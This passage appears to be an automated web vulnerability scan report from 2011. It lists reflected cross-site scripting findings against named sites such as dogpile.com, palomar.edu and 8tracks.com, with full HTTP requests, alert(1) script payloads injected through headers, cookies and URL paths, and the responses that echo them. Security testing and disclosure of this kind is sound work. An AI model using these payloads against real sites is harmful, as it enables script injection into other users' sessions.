"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
s.prop23 = (clearValue) ? "" : "";
s.prop24 = (clearValue) ? "" : "";
s.prop27 = (clearValue) ? "" : "";
s.prop29 = (clearValue) ? "" : "http://www.google.com/search?hl=en&q=c01b6";alert(1)//507cc18a657";
s.prop30 = (clearValue) ? "" : "";
s.prop31 = (clearValue) ? "" : "";
s.prop32 = (clearValue) ? "" : "";
s.prop33 = (clearValue) ? "" : "";
s.prop36 = (c
...[SNIP]...

2.118. http://www.palomar.edu/favicon.ico [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.palomar.edu
Path:	/favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 1afc0<script>alert(1)</script>36d474edfa6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.palomar.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=1afc0<script>alert(1)</script>36d474edfa6

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 16:27:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4692

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">

<titl
...[SNIP]...
<br>
                   REFERER -
                   http://www.google.com/search?hl=en&q=1afc0<script>alert(1)</script>36d474edfa6
                   <hr width="85%" align="center">
...[SNIP]...

2.119. http://www.palomar.edu/favicon.ico [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.palomar.edu
Path:	/favicon.ico

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload b46a4<script>alert(1)</script>bb137ca376a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3b46a4<script>alert(1)</script>bb137ca376a
Host: www.palomar.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 16:27:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4655

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">

<titl
...[SNIP]...
<br>
                   BROWSER -
                   curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3b46a4<script>alert(1)</script>bb137ca376a
                   <br>
...[SNIP]...

2.120. http://a.collective-media.net/cmadj/ns.androidtapp/general [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/ns.androidtapp/general

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea575'%3balert(1)//af3836957be was submitted in the cli cookie. This input was echoed as ea575';alert(1)//af3836957be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cmadj/ns.androidtapp/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=9242949008475990;ord1=123756;cmpgurl=http%253A//www.androidtapp.com/favicon.icoef3b2%25253Cscript%25253Ealert%25281%2529%25253C/script%25253Ed2de5acaa49? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(1)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7ea575'%3balert(1)//af3836957be; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; blue=1; qcdp=1; exdp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7302
Date: Fri, 01 Apr 2011 18:15:56 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-91116311_1301681756","http://ad.doubleclick.net/adj/ns.androidtapp/general;net=ns;u=,ns-91116311_1301681756,11e4f07c0988ac7ea575';alert(1)//af3836957be,Miscellaneous,;;ppos=atf;kw=;tile=2;cmw=nurl;sz=300x250,300x600;net=ns;ord1=123756;contx=Miscellaneous;dc=w;btg=;ord=9242949008475990?","300","250,300",false);</scr'+'ipt>
...[SNIP]...

2.121. http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dogpile.com
Path:	/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6f97"-alert(1)-"16796aa2d2e was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: dogpile.com
Proxy-Connection: keep-alive
Referer: http://dogpile.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:38 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&ActionId=81494ffc47974db2916bc16a3af0cb01&CookieDomain=.dogpile.come6f97"-alert(1)-"16796aa2d2e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 01 Apr 2011 16:55:36 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=81494ffc47974db2916bc16a3af0cb01&ActionId=037345b31ef849fab100c16a3af0cb01&CookieDomain=.dogpile.come6f97"-alert(1)-"16796aa2d2e; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:15:36 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:36 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:55:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:55:36 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 50685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=81494ffc47974db2916bc16a3af0cb01&ActionId=037345b31ef849fab100c16a3af0cb01&CookieDomain=.dogpile.come6f97"-alert(1)-"16796aa2d2e; expires=Fri, 01 Apr 2011 17:15:36 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.122. http://view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the C3UID cookie is copied into the HTML document as plain text between tags. The payload b2114<script>alert(1)</script>83bb10cb61c was submitted in the C3UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568b2114<script>alert(1)</script>83bb10cb61c; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:33 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_04-01-2011-18-10-29; expires=Mon, 04-Apr-2011 18:11:33 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadcon_04-01-2011-18-11-08_13920678781301681468ZZZZadver_04-01-2011-18-11-33_8406006771301681493; expires=Wed, 30-Mar-2016 18:11:33 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adcon_13920678781301681468ZZZZadver_8406006771301681493; expires=Fri, 01-Apr-2011 18:26:33 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='15400897811300976568b2114<script>alert(1)</script>83bb10cb61c';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='8406006771301681493';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcal
...[SNIP]...

2.123. http://www.8tracks.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.8tracks.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 95c41<script>alert(1)</script>3c9048a049 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico95c41<script>alert(1)</script>3c9048a049 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.8tracks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Content-Type: application/octet-stream
Connection: close
Status: 301
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
Location: http://8tracks.com/favicon.ico95c41<script>alert(1)</script>3c9048a049
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)
Content-Length: 170

Redirecting to <a href="http://8tracks.com/favicon.ico95c41<script>alert(1)</script>3c9048a049">http://8tracks.com/favicon.ico95c41<script>alert(1)</script>3c9048a049</a>

2.124. http://www.8tracks.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.8tracks.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7fd"><script>alert(1)</script>8cdd22bd928 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icofb7fd"><script>alert(1)</script>8cdd22bd928 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.8tracks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Content-Type: application/octet-stream
Connection: close
Status: 301
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
Location: http://8tracks.com/favicon.icofb7fd"><script>alert(1)</script>8cdd22bd928
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)
Content-Length: 176

Redirecting to <a href="http://8tracks.com/favicon.icofb7fd"><script>alert(1)</script>8cdd22bd928">http://8tracks.com/favicon.icofb7fd"><script>alert(1)</script>8cdd22bd928</a>

2.125. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11 [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile/ws/about/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54db6"-alert(1)-"a2bb9b9271 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile/ws/about/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:07 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=3e82ee12b85f4b1a9dd9c16a3af0cb01&ActionId=530d17a155f848679bfdc16a3af0cb01&CookieDomain=.dogpile.com54db6"-alert(1)-"a2bb9b9271

Response

2.126. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11 [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile/ws/contactUs/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33fd5"-alert(1)-"768c24deab8 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile/ws/contactUs/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.infospaceinc.com/contactus.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:11:55 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=8bf114849f6a409d9c06c16a3af0cb01&ActionId=2d7a6054427c4593a5ccc16a3af0cb01&CookieDomain=.dogpile.com33fd5"-alert(1)-"768c24deab8

Response

2.127. http://www.dogpile.com/dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11 [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b752"-alert(1)-"af835610013 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:07 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=530d17a155f848679bfdc16a3af0cb01&ActionId=f4a5e3c498ee4fafa621c16a3af0cb01&CookieDomain=.dogpile.com7b752"-alert(1)-"af835610013

Response

2.128. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11 [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b37d"-alert(1)-"effb104696b was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:13:12 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=effaa55f51f3463da4cac16a3af0cb01&ActionId=3e82ee12b85f4b1a9dd9c16a3af0cb01&CookieDomain=.dogpile.com7b37d"-alert(1)-"effb104696b

Response

2.129. http://www.dogpile.com/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/ [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55b30"-alert(1)-"3ee9c7682b4 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/ HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:09:49 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=d32b0d4b3c514b5288d5c16a3af0cb01&ActionId=9a55e47eb80046fb8013c16a3af0cb01&CookieDomain=.dogpile.com55b30"-alert(1)-"3ee9c7682b4

Response

2.130. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11 [DomainSession cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 172f4"-alert(1)-"a0abe5fa114 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
